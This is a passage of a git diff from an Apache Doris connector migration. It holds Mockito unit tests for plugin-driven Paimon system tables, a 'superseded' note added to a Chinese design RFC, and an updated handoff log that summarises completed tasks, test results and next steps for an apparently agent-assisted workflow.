'snapshots' from the SPI"); + Assertions.assertTrue(sysTables.containsKey("binlog"), "must expose 'binlog' from the SPI"); + Assertions.assertTrue(sysTables.get("snapshots") instanceof PluginDrivenSysTable, + "each value must be a generic PluginDrivenSysTable, not a connector-specific subtype"); + Mockito.verify(metadata).listSupportedSysTables(session, baseHandle); + } + + @Test + public void testGetSupportedSysTablesEmptyWhenNoBaseHandle() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.empty()); + + PluginDrivenExternalTable table = bareTable(catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + Assertions.assertTrue(table.getSupportedSysTables().isEmpty(), + "with no base handle there is nothing to query for sys tables"); + Mockito.verify(metadata, Mockito.never()) + .listSupportedSysTables(Mockito.any(), Mockito.any()); + } + + // ==================== findSysTable (inherited TableIf default) ==================== + + @Test + public void testFindSysTableResolvesBySuffix() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + Mockito.when(metadata.listSupportedSysTables(session, baseHandle)) + .thenReturn(Arrays.asList("snapshots", "binlog")); + + PluginDrivenExternalTable table = bareTable(catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + + Optional hit = table.findSysTable("t$snapshots"); + Assertions.assertTrue(hit.isPresent(), "t$snapshots must resolve to the 'snapshots' SysTable"); + Assertions.assertEquals("snapshots", hit.get().getSysTableName()); + // WHY: findSysTable does an exact, case-sensitive map.get of the suffix; an unknown suffix + // must miss. MUTATION: returning the whole map regardless of suffix would make 'nope' present. + Assertions.assertFalse(table.findSysTable("t$nope").isPresent(), + "an unknown system-table suffix must not resolve"); + } + + // ==================== createSysExternalTable: type + name + sibling delegation ==================== + + @Test + public void testCreateSysExternalTableReportsPluginTypeAndName() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + Mockito.when(metadata.listSupportedSysTables(session, baseHandle)) + .thenReturn(Collections.singletonList("snapshots")); + + PluginDrivenExternalTable base = bareTable(catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + PluginDrivenSysTable sysType = new PluginDrivenSysTable("snapshots"); + ExternalTable sysTable = sysType.createSysExternalTable(base); + + Assertions.assertTrue(sysTable instanceof PluginDrivenSysExternalTable); + // WHY (explicit guard "勿报 PAIMON_EXTERNAL_TABLE"): the generic sys table must inherit the + // PLUGIN_EXTERNAL_TABLE type and MUST NOT report any connector-specific type. MUTATION: a ctor + // that passes (e.g.) PAIMON_EXTERNAL_TABLE to super makes getType() != PLUGIN_EXTERNAL_TABLE -> red. + Assertions.assertEquals(TableType.PLUGIN_EXTERNAL_TABLE, sysTable.getType(), + "sys table must report PLUGIN_EXTERNAL_TABLE, not a connector-specific type"); + Assertions.assertEquals("tbl$snapshots", sysTable.getName(), + "sys table name must be base name + '$' + sysName (planner-visible name)"); + Assertions.assertEquals("REMOTE_TBL$snapshots", sysTable.getRemoteName(), + "sys table remote name must be base remote name + '$' + sysName"); + // getSupportedSysTables delegates to the source so DESCRIBE/SHOW on a sys table lists siblings. + Assertions.assertTrue(sysTable.getSupportedSysTables().containsKey("snapshots"), + "sys table getSupportedSysTables must delegate to the source table (sibling listing)"); + + Assertions.assertThrows(IllegalArgumentException.class, + () -> sysType.createSysExternalTable(Mockito.mock(ExternalTable.class)), + "createSysExternalTable must reject non-PluginDrivenExternalTable sources"); + } + + // ==================== handle threading: sys query reads the SYS table, not the base =========== + + @Test + public void testSysTableThreadsSysHandleNotBaseHandle() { + // Mock getTableHandle -> a BASE handle; getSysTableHandle -> a DISTINCT sys handle. + // Driving initSchema on the sys table must read schema via the SYS handle, proving the sys + // query reads the system table, not the base. This is the whole point of T18. + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + ConnectorTableHandle baseHandle = Mockito.mock(ConnectorTableHandle.class); + ConnectorTableHandle sysHandle = Mockito.mock(ConnectorTableHandle.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + ExternalDatabase db = mockDb("REMOTE_DB"); + + // Base handle resolved from the SOURCE remote name (not the "$"-suffixed sys remote name). + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.of(baseHandle)); + Mockito.when(metadata.getSysTableHandle(session, baseHandle, "snapshots")) + .thenReturn(Optional.of(sysHandle)); + ConnectorTableSchema sysSchema = new ConnectorTableSchema( + "REMOTE_TBL$snapshots", + Collections.singletonList(new ConnectorColumn("snapshot_id", ConnectorType.of("BIGINT"), "", true, null)), + "paimon", + Collections.emptyMap()); + Mockito.when(metadata.getTableSchema(session, sysHandle)).thenReturn(sysSchema); + Mockito.when(metadata.fromRemoteColumnName(Mockito.eq(session), Mockito.anyString(), + Mockito.anyString(), Mockito.anyString())) + .thenAnswer(inv -> inv.getArgument(3)); + + PluginDrivenExternalTable base = bareTable(catalog, db, "REMOTE_TBL"); + PluginDrivenSysExternalTable sysTable = new PluginDrivenSysExternalTable(base, "snapshots") { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + }; + + Optional result = sysTable.initSchema(); + + Assertions.assertTrue(result.isPresent()); + // WHY: the sys handle (NOT the base handle) must be what flows into getTableSchema, so a sys + // query reads the system table's schema. MUTATION: an override that returned the base handle + // (skipping getSysTableHandle) would call getTableSchema(session, baseHandle) -> these verify + // assertions go red. + Mockito.verify(metadata).getSysTableHandle(session, baseHandle, "snapshots"); + Mockito.verify(metadata).getTableSchema(session, sysHandle); + Mockito.verify(metadata, Mockito.never()).getTableSchema(session, baseHandle); + } + + @Test + public void testSysTableEmptyWhenBaseHandleMissing() { + ConnectorMetadata metadata = Mockito.mock(ConnectorMetadata.class); + ConnectorSession session = Mockito.mock(ConnectorSession.class); + TestablePluginCatalog catalog = new TestablePluginCatalog("paimon", metadata, session); + Mockito.when(metadata.getTableHandle(session, "REMOTE_DB", "REMOTE_TBL")) + .thenReturn(Optional.empty()); + + PluginDrivenExternalTable base = bareTable(catalog, mockDb("REMOTE_DB"), "REMOTE_TBL"); + PluginDrivenSysExternalTable sysTable = new PluginDrivenSysExternalTable(base, "snapshots") { + @Override + protected synchronized void makeSureInitialized() { + // no-op + } + }; + + Assertions.assertFalse(sysTable.initSchema().isPresent(), + "no base handle -> no sys handle -> empty schema (no spurious getSysTableHandle)"); + Mockito.verify(metadata, Mockito.never()) + .getSysTableHandle(Mockito.any(), Mockito.any(), Mockito.anyString()); + } + + // ==================== helpers (mirror PluginDrivenExternalTablePartitionTest) ==================== + + /** Table that drives the real getSupportedSysTables()/initSchema(); does not stub the schema cache. */ + private static PluginDrivenExternalTable bareTable(PluginDrivenExternalCatalog catalog, + ExternalDatabase db, String remoteName) { + return new PluginDrivenExternalTable(1L, "tbl", remoteName, catalog, db) { + @Override + protected synchronized void makeSureInitialized() { + // no-op: skip Env-backed catalog/db init + } + }; + } + + @SuppressWarnings("unchecked") + private static ExternalDatabase mockDb(String remoteName) { + ExternalDatabase db = Mockito.mock(ExternalDatabase.class); + Mockito.when(db.getRemoteName()).thenReturn(remoteName); + return db; + } + + /** + * Minimal PluginDrivenExternalCatalog that returns a fixed connector/session without standing up + * the Doris environment (mirrors PluginDrivenExternalTablePartitionTest.TestablePluginCatalog). + */ + private static class TestablePluginCatalog extends PluginDrivenExternalCatalog { + private final Connector connector; + private final ConnectorSession session; + + TestablePluginCatalog(String catalogType, ConnectorMetadata metadata, ConnectorSession session) { + this(catalogType, mockConnector(metadata, session), session); + } + + private TestablePluginCatalog(String catalogType, Connector connector, ConnectorSession session) { + super(1L, "test-catalog", null, makeProps(catalogType), "", connector); + this.connector = connector; + this.session = session; + } + + private static Connector mockConnector(ConnectorMetadata metadata, ConnectorSession session) { + Connector c = Mockito.mock(Connector.class); + Mockito.when(c.getMetadata(session)).thenReturn(metadata); + return c; + } + + @Override + public Connector getConnector() { + return connector; + } + + @Override + public ConnectorSession buildConnectorSession() { + return session; + } + + @Override + protected List listDatabaseNames() { + return Collections.emptyList(); + } + + @Override + protected List listTableNamesFromRemote(SessionContext ctx, String dbName) { + return Collections.emptyList(); + } + + @Override + public boolean tableExist(SessionContext ctx, String dbName, String tblName) { + return false; + } + + private static Map makeProps(String type) { + Map props = new HashMap<>(); + props.put("type", type); + return props; + } + } +} diff --git a/plan-doc/01-spi-extensions-rfc.md b/plan-doc/01-spi-extensions-rfc.md index 473e2a7df9e918..a427e495e74aee 100644 --- a/plan-doc/01-spi-extensions-rfc.md +++ b/plan-doc/01-spi-extensions-rfc.md @@ -774,6 +774,8 @@ public class PluginDrivenScanNode extends FileQueryScanNode { ## 10. 扩展 E7:Sys Tables +> ⚠️ **本节 §10.2/§10.3 的「`$`-后缀普通表 + 连接器 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」设计已被 D-039 / DV-023 取代(superseded 2026-06-10,P5-B4 实现时)。** 该设计**从未落地**;live fe-core 实际用 `SysTableResolver` + `NativeSysTable` + `TableIf.getSupportedSysTables/findSysTable`(iceberg + legacy-paimon 共用)。P5-B4 复用该 live 机制:连接器 SPI 加 `ConnectorTableOps.listSupportedSysTables` + `getSysTableHandle`(default no-op),fe-core 加通用 `PluginDrivenSysTable extends NativeSysTable` + `PluginDrivenSysExternalTable`(报 `PLUGIN_EXTERNAL_TABLE`,经 `SysTableResolver` 路由到 `PluginDrivenScanNode`)。§10.1 现状仍准确;下方 §10.2/§10.3 仅作历史设计追溯,**勿据其实现**。详见 [decisions-log D-039](./decisions-log.md) / [deviations-log DV-023](./deviations-log.md) / `tasks/P5-paimon-migration.md` §批次 B4。 + ### 10.1 现状 - `IcebergSysExternalTable.SysTableType` 枚举(`HISTORY`、`SNAPSHOTS`、`FILES`、`MANIFESTS`、`PARTITIONS`、`POSITION_DELETES`、`ALL_DATA_FILES`、`ALL_MANIFESTS`、`ENTRIES`)。 diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 843b6cb9a5c877..36ac5a41943d86 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,46 +5,48 @@ --- -# 🔥 2026-06-10 — P5 paimon B3 完成(DDL metadata,T11-T15);下一步 = B4(sys-tables E7 + MVCC E5) +# 🔥 2026-06-10 — P5 paimon B4 完成(sys-tables E7 + MVCC E5,T16-T20);下一步 = B5(MTMV 桥) -> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B3**(DDL metadata)。subagent-driven(understand workflow → 主线 firsthand 核读 → 用户签 D7 → 3 dispatch 各 implement→spec-review→quality-review,全 mutation-verified → 3-lens final holistic review + 主线 firsthand 复跑)。**B2+B3 改动均未提交**(用户决定何时 commit;同处 dirty tree)。 +> **本 session**:按 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) 落地 **B4**。subagent-driven(understand workflow 6-agent → 主线 firsthand 核读 → 用户签 D-039 + T20 留 B4 → 5 dispatch 各 implement→双审/fix-loop → 3-lens final holistic review + 主线 firsthand 复跑)。**B0–B3 已 commit(`a2b765677d1`);B4 改动未提交**(用户控时机,工作树仅含 B4)。 -## ✅ 本 session 已完成(B3 = T11-T15,纯连接器侧,0 fe-core/SPI/api 改动) +## ✅ 本 session 已完成(B4 = T16-T20) -- **T11**:`PaimonTypeMapping.toPaimonType(ConnectorType)` 反向(switch on `getTypeName()`,byte-parity `DorisToPaimonTypeVisitor.atomic:82-108`:char-family→`VarCharType(MAX)`、DATETIME→no-arg `TimestampType`(scale 丢)、map-key `.copy(false)`、struct id `AtomicInteger(-1)`、gap→`DorisConnectorException`保留 legacy 窄集)。 -- **T12**:新 `PaimonSchemaBuilder.build(request)`(port `PaimonMetadataOps.toPaimonSchema:231-256`:PK from `properties["primary-key"]`、identity partitionKeys、location→`CoreOptions.PATH`、strip primary-key/comment、per-column `.copy(nullable)`)。**2 故意 safer 偏差**(已 doc + 测):comment `properties["comment"]`优先否则 fallback `request.getComment()`(legacy 只读 prop,丢 COMMENT 子句);PK drop-blank。非-identity transform→throw。 -- **T13**:`createTable`(override request-overload,`PaimonSchemaBuilder` build 在 wrap **外** → schema-fail raw 不双包)+ `dropTable`(handle-based idempotent ignoreIfNotExists=true)。remote-vs-local 名 bug 在 SPI 层 **moot**(请求单名 from `db.getRemoteName()`)。 -- **T14**:`supportsCreateDatabase=true` + `createDatabase`(HMS-only-props gate,flavor 读注入 `catalogProperties` via `resolveFlavor`,gate 在 auth **前**;ignoreIfExists=false 因 FE 已 short-circuit)+ 4-arg `dropDatabase(force)`(enumerate-loop **AND** native cascade,legacy `performDropDb:147-163` belt-and-suspenders,非 MC enumerate-only;整体一个 auth scope)。 -- **T13/T14 D7=B**:seam `PaimonCatalogOps` 加 4 DDL 方法(+ `CatalogBackedPaimonCatalogOps` delegations + `RecordingPaimonCatalogOps` fake,paimon `Catalog` 签名 javap 核);**thread `ConnectorContext` 入 `PaimonConnectorMetadata`(3-arg ctor,无 2-arg;`PaimonConnector.getMetadata` 传 context)**;4 个 DDL op 各包 `context.executeAuthenticated`,**read 路径不包**(B2 现状未改)。 -- **T15**:4 新测类(`PaimonTypeMappingToPaimonTest`10 / `PaimonSchemaBuilderTest`10 / `PaimonConnectorMetadataDdlTest`9 / `PaimonConnectorMetadataDbDdlTest`11)+ `RecordingConnectorContext`(failAuth 钉 auth-wrap:seam 在 wrap 内)+ `RecordingPaimonCatalogOps` DDL 扩。no-mockito,WHY+MUTATION。 -- **验证(主线 firsthand 复跑)**:`Tests run: 96, Failures: 0, Errors: 0, Skipped: 1`(1=live)+ BUILD SUCCESS + checkstyle 0 + import-gate 0 + **无 fe-core/fe-connector-api/fe-connector-spi 改动** + 无 B7 cutover 泄漏。每 dispatch 双审 mutation-verified;3-lens final holistic(parity/adversarial/scope-build)= 全 READY。 +- **T16**(greenfield E7 SPI):`ConnectorTableOps` 加 `listSupportedSysTables(session, baseHandle)`→`List` + `getSysTableHandle(session, baseHandle, sysName)`→`Optional`,**default no-op**(MC/jdbc/es/trino 不受影响)。唯一 `fe-connector-api` 改动。 +- **T17**(paimon 实现 E7):`PaimonConnectorMetadata.listSupportedSysTables`=`SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 经**现有** `getTable(Identifier)` seam 喂 4-arg `new Identifier(db,table,"main",sysName)`(branch 硬编 "main")。`PaimonTableHandle` 加 serializable `sysTableName`+`forceJni`(="binlog"||"audit_log"),`forSystemTable` factory,lowercase 规范化,equals/hashCode 含 sysTableName。**fix-loop**:抽共享 `PaimonTableResolver.resolve(catalogOps, handle)`(metadata+scan **一处** sys-aware reload;修 scan-twin 丢 sys-Table)+ Java 序列化 round-trip 测 + null-guard。 +- **T18**(fe-core 通用):`PluginDrivenExternalTable` 把 4 处 handle 获取集中入 `protected resolveConnectorTableHandle(session, metadata)` seam + `getSupportedSysTables()` override 委托连接器 `listSupportedSysTables`;新 `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(**报 PLUGIN_EXTERNAL_TABLE**,override `resolveConnectorTableHandle` 喂 sys handle,transient 不持久化/**不 GSON 注册**)+ 新 `PluginDrivenSysTable extends NativeSysTable`(`createSysExternalTable`)。复用 live `SysTableResolver`/`TableIf.getSupportedSysTables/findSysTable` 机制(D-039)。 +- **T19**(forceJni + 描述符 + fail-loud):`PaimonScanPlanProvider` DataSplit 分支 gate `shouldUseNativeReader(forceJni,…)`=`!forceJni && supportNativeReader`(ro 仍 native、metadata 表经 non-DataSplit JNI);`PaimonConnectorMetadata.buildTableDescriptor`→`HIVE_TABLE`+`THiveTable`(**同修 B2 遗留** SCHEMA_TABLE fallback [DV-024],普通+sys 表共修);`PluginDrivenScanNode` 加 `checkSysTableScanConstraints()`(sys 表 + scan-params/snapshot → fail-loud,跑于 getSplits+startSplit 两入口)。 +- **T20**(首个 E5 消费者,**inert until B5**):`beginQuerySnapshot/getSnapshotAt/getSnapshotById`(snapshot seam `latestSnapshotId`/`snapshotIdAtOrBefore`/`snapshotExists`:SDK 实现在 `CatalogBackedPaimonCatalogOps`、fake 在 `RecordingPaimonCatalogOps`;sys handle→`Optional.empty`;空表→-1;SPI **empty-if-none** vs legacy throw 已 doc——B5 消费方 surface 用户错误)+ `PaimonConnector.getCapabilities`=`SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`。 +- **验证(主线 firsthand 复跑)**:import-gate 0;连接器 `Tests run: 124, Failures: 0, Errors: 0, Skipped: 1`(live);fe-core `PluginDriven*Test` `Tests run: 100, Failures: 0, Errors: 0`;checkstyle 0;**无 cutover 泄漏**(paimon 未入 `SPI_READY_TYPES`、GsonUtils/CatalogFactory/PhysicalPlanTranslator 零改)+ **无 B5 泄漏**(`PluginDrivenExternalTable` 仍非 MvccTable)。每 dispatch 双审/mutation-verified;3-lens final holistic = PARITY/SCOPE READY + 1 ADVERSARIAL BLOCKER 已修。 -## 🧠 核心发现 / 纠偏(B3 understand 纠偏 1 处 plan 前提 → D7;另证实 1 处 plan 前提为真) +## 🧠 核心发现 / 纠偏(understand 纠偏 2 处 + final review 1 BLOCKER) -1. **T13 authenticator → D7=B(签字)**:plan「per-flavor authenticator」与 code 冲突——MC DDL **不**用 authenticator;legacy `PaimonMetadataOps` **每** call 包 `executionAuthenticator.execute`;**B2 read 路径不 re-wrap**(靠构建时一次 wrap);metadata 当前不收 `ConnectorContext`。用户签 **B=legacy parity**(thread context + 每 DDL op 包 wrap,read 不动)。**遗留不一致**:read 未 wrap、DDL 已 wrap——若 live-e2e 证 Kerberized **读**也需 call-time doAs,则 read 须补 wrap(B2 回改,归翻闸前 live-e2e authenticator 门)。 -2. **「PluginDrivenExternalCatalog 已 override FE 侧」证实为真**(非纠偏):FE 4 个 DDL 分发(createTable:300 / createDb:355 / dropDb:387 / dropTable:439)已通用接 SPI(`connector.getMetadata`),MC 已证端到端通。memory [[catalog-spi-cutover-fe-dispatch-gap]] 警告的 FE 分发缺口**对 paimon DDL 不适用**——真闸是 `CatalogFactory.SPI_READY_TYPES` 成员(paimon 未入 → 现走 built-in `PaimonExternalCatalog`),属 **B7/T27**,非 B3 缺口。B3 纯连接器侧。 -3. **understand workflow 韧性**:6 agent 中 2 个返回退化 stub(占位「test」值),其 scope 由其余 4 agent 全覆盖并 cross-verified——结论无损。下轮可在 prompt 里加「拒绝占位输出」。 +1. **D-039(签字)— E7 形状 = 复用 live SysTable 机制(非 RFC §10)**:RFC §10 的「`$`-后缀普通表 + 连接器 `getTableHandle` 内解析 + `listSysTableSuffixes`」**从未落地**;live fe-core 用 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(iceberg+legacy-paimon 共用)。用户签复用该机制。RFC §10 已加 superseded 脚注([DV-023])。 +2. **T20 MVCC inert until B5(签字留 B4)**:E5 SPI 方法早存在 default-no-op,但 `PluginDrivenExternalTable` 非 `MvccTable`、`ConnectorMvccSnapshotAdapter` 零构造方、capability 零 reader → T20 实现纯连接器侧 groundwork,无可观察行为,须 B5 接活。翻闸(B7) gated on B5,故 inert capability 不达用户(安全)。 +3. **final review BLOCKER(已修)**:`PluginDrivenScanNode.create` 原直调 `metadata.getTableHandle(remoteName)` **绕过** T18 的 `resolveConnectorTableHandle` seam → sys 表得普通 handle(forceJni=false)→ binlog/audit_log DataSplit 走 native **静默错行**(inert today,翻闸后 live)。修 = `create` 改走 `table.resolveConnectorTableHandle(session, metadata)`(普通表字节等价、sys 表得 sys handle),TDD red→green。**教训**:scan node 有独立 handle 获取面,T18 集中 seam 时漏了它——下轮改 fe-core handle 流时须 grep 全 `metadata.getTableHandle(` 调用方。 +4. **DV-024(B2 遗留缺陷,B4 顺修)**:连接器无 `buildTableDescriptor` override → 普通 paimon plugin 表 toThrift 走 SCHEMA_TABLE fallback(BE `descriptors.cpp:635` SchemaTableDescriptor),legacy+sys 须 HIVE_TABLE(`:644`)。T19 一处 override 同修普通+sys。 -## 🎯 下一 session = B4(sys-tables E7 + MVCC E5;gated on B2+B3 全完,现满足) +## 🎯 下一 session = B5(MTMV 桥;gated on B4 全完,现满足) -- **T16(greenfield SPI,签名须慎)**:`ConnectorMetadata.listSupportedSysTables`(default emptySet) + `getSysTableHandle`(default empty);保 MC/jdbc/es/trino 不受影响。**被未来 iceberg/hudi 复用,设计错须二次迁移**。 -- **T17**:paimon 实现 E7(名取 `SystemTableLoader.SYSTEM_TABLES`;`getSysTableHandle` 走 4-arg `Identifier(db,tbl,"main",sysName)`;handle 带 sysName+forceJni;reload fallback;branch="main" 限制保留+doc)。 -- **T18(greenfield fe-core)**:通用 `PluginDrivenSysExternalTable extends PluginDrivenExternalTable`(报 PLUGIN_EXTERNAL_TABLE,**勿报 PAIMON_EXTERNAL_TABLE**) + `NativeSysTable` factory;override `getSupportedSysTables/findSysTable` 委托连接器。 -- **T19**:`PaimonScanPlanProvider` 加 forceJni 分支(binlog/audit_log + 非 DataTable sys 全走 JNI——native = 行错静默)+ 通用节点 fail-loud 拒 sys 表 scan-params/time-travel;核 BE sys-table `TTableDescriptor`(HIVE_TABLE?)。 -- **T20(首个 E5 消费者)**:`beginQuerySnapshot/getSnapshotAt/getSnapshotById`(返 `ConnectorMvccSnapshot(snapshotId)`,空表 -1)+声明 `SUPPORTS_MVCC_SNAPSHOT/TIME_TRAVEL`;sys 表不得透出 time-travel。 -- 批次依赖见 [tasks/P5-paimon-migration.md](./tasks/P5-paimon-migration.md) §批次依赖。**B5**(MTMV 桥)gated on B4 全完。**B6**(procedure doc no-op,独立)可随时穿插。 +- **核心任务 = 把 B4 inert 的 E5 接活 + 落 MTMV 桥**。批次依赖见 [tasks/P5](./tasks/P5-paimon-migration.md) §批次依赖。**gated on D2=A(已签)**。 +- **T21(GAP-LISTPART-AT-SNAPSHOT)**:`listPartitions` 加 at-snapshot 重载(按 pin 的 snapshotId 列分区);连接器实现;默认保 latest 向后兼容。单-pin 不变式前提。 +- **T22(fe-core)**:`PaimonPluginDrivenExternalTable extends PluginDrivenExternalTable` implements `MTMVRelatedTableIf`+`MTMVBaseTableIf`+`MvccTable`;`loadSnapshot`(`beginQuerySnapshot` 定 snapshotId + at-snapshot 物化分区集**一次**)。**这是 E5 接活点**:须调 `connector.getMetadata().beginQuerySnapshot` + 构造 `ConnectorMvccSnapshotAdapter`(现零构造方);并把 scan-params/time-travel 接到 `PluginDrivenScanNode`(接活后 T19 sys-table fail-loud guard 才生效,否则现 dormant)。 +- **T23**:子类 MTMV 方法(getTableSnapshot→`MTMVSnapshotIdSnapshot`(-1)/getPartitionSnapshot→`MTMVTimestampSnapshot`(缺抛 AnalysisException)/getAndCopyPartitionItems(读 pin 非重列)/getPartitionType/getPartitionColumnNames/isPartitionColumnAllowNull(true)/beforeMTMVRefresh(no-op)/getNewestUpdateVersionOrTime(**绕 pin**))。 +- **T24**:rehome fe-core `PaimonMvccSnapshot`(包 `ConnectorMvccSnapshot` + fe-core 物化 name→PartitionItem/lastModifiedMillis/listed-count);downcast 留 fe-core 内。 +- **T25**:isPartitionInvalid parity(捕 listPartitions count vs 成功构建 PartitionItem count,size 不匹配→UNPARTITIONED 全表刷);MTMV 单-pin 不变式测 + UT。 +- **B5 还须翻 `partition_columns` schema key + 6-arg planScan/requiredPartitions + FE 消费 `listPartitions*`**(B2 遗留前置硬门——`getTableSchema` 现发 `partition_keys`,fe-core `PluginDrivenExternalTable:181` 读 `partition_columns`,FE 现把 paimon 当非分区)。raw-vs-rendered(`listPartitionValues` 返 RAW epoch-day vs legacy TVF RENDERED)须核。 +- **B6**(procedure doc no-op,独立)可随时穿插。 ## ⚙️ 操作须知(复用) -- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**,裸 -pl 会因 `${revision}` 兄弟解析虚假失败);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 -- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。`org.apache.paimon.*` 全可(含 `catalog.Catalog` DDL、`schema.Schema`、`CoreOptions`、`types.*`、`utils.DateTimeUtils`)。`org.apache.doris.connector.{api,spi}.*` 可(`ConnectorContext.executeAuthenticated(Callable) throws Exception` 默认 no-op)。连接器测试无 mockito(`RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`FakePaimonTable` 手写 fake;测须带 WHY+MUTATION);checkstyle 含 test 源、绑 validate。 -- **subagent-driven 节奏(B3 用)**:understand workflow(read-only fan-out 验 plan 前提)→ 主线 firsthand 核读 + 用户签决策 → 每 dispatch 用 Agent 工具(非 worktree 隔离,共享 dirty tree,顺序 build-on-previous)implement→spec-review→quality-review→fix-loop → final holistic Workflow(多 lens 并行)+ 主线 firsthand 复跑。**所有 subagent prompt 里禁 `git checkout/restore/stash/reset`**(会抹未提交工作)+ 嘱「不要 commit」(用户控)。 -- 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table,[[catalog-spi-gson-migrate-all-three]] / [[catalog-spi-cutover-fe-dispatch-gap]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 -- **未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`,**含明文 ak/sk/Kerberos 凭据**)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`(用户本地集群配置)。B3 未碰它们。 +- maven 绝对 `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false`(**须 -am**);改连接器 `:fe-connector-paimon`、改 SPI `:fe-connector-api`、改 fe-core `:fe-core`(**fe-core 大,测试用 `-Dtest='PluginDriven*Test' -DfailIfNoTests=false` SCOPE**)。读真实 `Tests run:`/`BUILD`,勿信后台 echo exit([[doris-build-verify-gotchas]])。 +- 连接器禁 import fe-core/fe-common(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`;import-gate `bash tools/check-connector-imports.sh`)。**允许** `org.apache.paimon.*`、`org.apache.doris.connector.{api,spi}.*`、**`org.apache.doris.thrift.*`**(thrift provided,MC/paimon 均用)。连接器测试无 mockito(手写 `RecordingPaimonCatalogOps`/`RecordingConnectorContext`/`FakePaimonTable`,测带 WHY+MUTATION);**fe-core 测可用 mockito**;checkstyle 含 test 源、绑 validate。 +- **subagent-driven 节奏(B4 用,B5 复用)**:understand workflow(read-only fan-out 验 plan 前提,**警惕退化 stub**)→ 主线 firsthand 核读 + 用户签决策 → 每 dispatch 用 Agent 工具(非 worktree、共享 dirty tree、顺序 build-on-previous)implement→spec/quality 双审→fix-loop → final holistic Workflow(3 lens 并行:parity/adversarial/scope)+ 主线 firsthand 复跑。**所有 subagent prompt 禁 `git checkout/restore/stash/reset`** + 嘱「不要 commit」。**无 SendMessage 工具**——fix-loop 用新 Agent dispatch(带全上下文)。 +- 翻闸(B7)GSON **7 注册原子齐迁**(5 catalog + db + table→`PaimonPluginDrivenExternalTable` 非裸 base,[[catalog-spi-gson-migrate-all-three]]);删 legacy(B8)后验 paimon-core FE classpath 恰一份([[catalog-spi-be-java-ext-shared-classpath]])。 +- **未跟踪/本地 scratch 勿提交**:`regression-test/conf/regression-conf.groovy`(+`.bak`,含明文凭据)、`.audit-scratch/`、`conf.cmy/`、`.claude/scheduled_tasks.lock`、**`META-INF/`**(本 session 出现的 maven 构建产物,勿 `git add`)。B4 未碰它们。 ## 🧠 给下一个 agent 的 meta -- **D1/D2/D4/D5/D6/D7 已签字**,B0+B1+B2+B3 已落 —— 按设计 doc B4→B9 续。 -- **live e2e(真实 paimon 各 flavor 环境)= 翻闸真正完成门**(CI 跳),翻闸前用户验;现累计 live-e2e 硬门:hms/dlf metastore client 跨 loader、jdbc driver allow-list、hive-site.xml、live createCatalog(B1);DDL `executeAuthenticated`(D7=B) 在 Kerberized HMS/HDFS 正确性(B3);`lastFileCreationTime()` 跨 flavor + DATE 渲染 raw-vs-rendered(B2)。 -- **B5 reconcile 项(仍 dormant)**:`partition_columns` schema key 未翻(FE 现把 paimon 当非分区);`listPartitionValues` 返 RAW spec、legacy TVF 返 RENDERED;MTMV 单-pin 不变式(最高 correctness 风险)。 -- auto-memory:[[catalog-spi-p5-paimon-design]](设计决策)、[[catalog-spi-p5-b1-design]](B1 flavor 装配)、[[catalog-spi-p5-b2-design]](B2 3 处 plan 纠偏)、[[catalog-spi-p5-b3-design]](B3 DDL:D7=B authenticator + FE-dispatch 缺口证伪 + 2 safer 偏差)、[[catalog-spi-connector-session-tz-gotcha]](含 paimon 例外)。 +- **D1/D2/D4/D5/D6/D7/D-039 已签字**,B0+B1+B2+B3+B4 已落 —— 按设计 